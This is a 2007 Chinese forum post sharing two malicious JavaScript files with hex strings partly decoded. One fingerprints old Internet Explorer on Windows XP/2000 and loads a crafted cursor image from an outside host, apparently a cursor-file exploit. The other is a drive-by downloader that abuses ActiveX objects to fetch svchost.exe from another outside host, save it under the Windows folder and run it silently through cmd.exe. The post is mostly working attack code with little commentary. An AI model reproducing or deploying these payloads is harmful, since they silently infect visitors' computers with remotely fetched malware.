那两个JS文件貌似是很久之前的东西了
new.js- info = "<head>" +"\n"+
- "<meta http-equiv="Content-Language" content="zh-cn">" +"\n"+
- "</head>" +"\n"+
- "<div id="new_content_jp" style="display:none"></div>" +"\n"+
- "<div id="new_content_jp" style="display:none"></div>" +"\n"+
- "<script language="javascript" >" +"\n"+
- "function checkIE(){" +"\n"+
- "var jpDiv = document.getElementById("new_content_jp")" +"\n"+
- "var a=navigator.userAgent.toLowerCase();" +"\n"+
- "if (navigator.appVersion.indexOf(\'MSIE\')!=-1){" +"\n"+
- " version=parseFloat(navigator.appVersion.split(\'MSIE\')[1])" +"\n"+
- " if (version>5 && version<=7){" +"\n"+
- " w2k = ((a.indexOf(\'windows nt 5.0\')!=-1) || (a.indexOf(\'windows 2000\')!=-1));" +"\n"+
- " wxp = ((a.indexOf(\'windows nt 5.1\')!=-1) || (a.indexOf(\'windows xp\')!=-1));" +"\n"+
- " w2k3 = ((a.indexOf(\'windows nt 5.2\')!=-1) || (a.indexOf(\'windows 2003\')!=-1));" +"\n"+
- "" +"\n"+
- " if(wxp)jpDiv.innerHTML = "<div style=\\"cursor: url(http:\\/\\/16a.us\\/oK\\/MyTest2.jpg)\\"><div style=\\"cursor: url(http:\\/\\/16a.us\\/oK\\/MyTest2.jpg)\\">";" +"\n"+
- " if(w2k)jpDiv.innerHTML = "<div style=\\"cursor: url(http:\\/\\/16a.us\\/oK\\/MyTest2.jpg)\\"><div style=\\"cursor: url(http:\\/\\/16a.us\\/oK\\/MyTest2.jpg)\\">";" +"\n"+
- " }" +"\n"+
- "" +"\n"+
- "}" +"\n"+
- "" +"\n"+
- "}" +"\n"+
- "setTimeout("checkIE();",300);" +"\n"+
- "</script>" +"\n"+
- "<script>window.onerror=function(){return true;}</script>"
- document.write(info)
复制代码
http://16a.us/oK/MyTest2.jpg
Vernum.js,只把主要的16进制转换了一下- document.writeln("<script>window.onerror=function(){return true;}<\/script>");
- document.writeln("<script>");
- document.writeln("DZ='http://7y7.us/oK/svchost.exe';");
- document.writeln("function GnMs(n) ");
- document.writeln("{ ");
- document.writeln(" var numberMs = Math.random()*n;");
- document.writeln(" return \'clssid'+Math.round(numberMs)+\'.tmp\';");
- document.writeln("} ");
- document.writeln(" try ");
- document.writeln("{");
- document.writeln(" var Bf=document.createElement("\\x6F\\x62\\x6A\\x65\\x63\\x74");");
- document.writeln(" Bf.setAttribute("classid");");
- document.writeln(" var Kx=Bf.CreateObject("\\x4D\\x69\\x63\\x72\\x6F\\x73\\x6F\\x66\\x74\\x2E\\x58"+"\\x4D\\x4C\\x48\\x54\\x54\\x50","");");
- document.writeln(" var AS=Bf.CreateObject("\\x41\\x64\\x6F\\x64\\x62\\x2E\\x53\\x74\\x72\\x65\\x61\\x6D","");");
- document.writeln(" AS.type=1;");
- document.writeln(" Kx.open("\\x47\\x45\\x54", DZ,0);");
- document.writeln(" Kx.send();");
- document.writeln(" Ns1=GnMs(9999);");
- document.writeln(" var cF=Bf.CreateObject("\\x53\\x63\\x72\\x69\\x70\\x74\\x69\\x6E\\x67\\x2E\\x46\\x69\\x6C\\x65\\x53\\x79\\x73\\x74\\x65\\x6D\\x4F\\x62\\x6A\\x65\\x63\\x74","");");
- document.writeln(" var NsTmp=cF.GetSpecialFolder(0); Ns1= cF.BuildPath(NsTmp,Ns1); AS.Open();AS.Write(Kx.responseBody);");
- document.writeln(" AS.SaveToFile(Ns1,2); AS.Close(); var q=Bf.CreateObject("\\x53\\x68\\x65\\x6C\\x6C\\x2E\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E","");");
- document.writeln(" ok1=cF.BuildPath(NsTmp+\'\\x5C\\x5C\\x73\\x79\\x73\\x74\\x65\\x6D\\x33\\x32\',\'\\x63\\x6D\\x64\\x2E\\x65\\x78\\x65\');");
- document.writeln(" q.SHeLLExecute(ok1,\'\\x20\\x2F\\x63 \'+Ns1,"","\\x6F\\x70\\x65\\x6E",0);");
- document.writeln("} ");
- document.writeln(" catch(MsI) { MsI=1; }");
- document.writeln("<\/script>")
复制代码
http://7y7.us/oK/svchost.exe
[ 本帖最后由 dikex 于 2007-5-23 22:47 编辑 ] |